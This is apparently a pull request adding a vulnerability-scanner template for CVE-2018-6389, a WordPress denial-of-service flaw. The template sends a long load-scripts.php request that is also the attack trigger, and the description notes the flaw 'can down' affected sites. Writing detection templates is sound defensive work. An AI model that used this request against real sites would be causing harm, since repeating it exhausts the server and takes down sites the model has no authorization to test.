### PR TITLE
CVE-2018-6389 Added

### DIFF
--- a/cves/CVE-2018-6389.yaml
+++ b/cves/CVE-2018-6389.yaml
@@ -6,6 +6,7 @@ info:
   severity: medium
 
 # Source: https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2018-6389
+# Check the version is inside 4.9.2 or not yourself :)
 
 requests:
   - method: GET

--- a/cves/CVE-2018-6389.yaml
+++ b/cves/CVE-2018-6389.yaml
@@ -1,0 +1,25 @@
+id: CVE-2018-6389
+
+info:
+  name: Wordpress DOS via load-scripts.php
+  author: remonsec
+  severity: medium
+
+# Source: https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2018-6389
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 304
+          - 301
+          - 302
+      - type: dsl
+        dsl:
+          - "len(body)>750 && status_code!=403"
+        part: body


### PR DESCRIPTION
### Summary
**CVE-2018-6389** Can Down Any WordPress site under ```4.9.3```
The flaw affects the **load-scripts.php** WordPress script, it receives a parameter called ```load```
### Template workflow
I use to check the body length is upper then ```750``` and confirm that HTTP status is not ```403```
I have tested it properly and worked well for me
### CVE Reference
**Rapid7:** https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2018-6389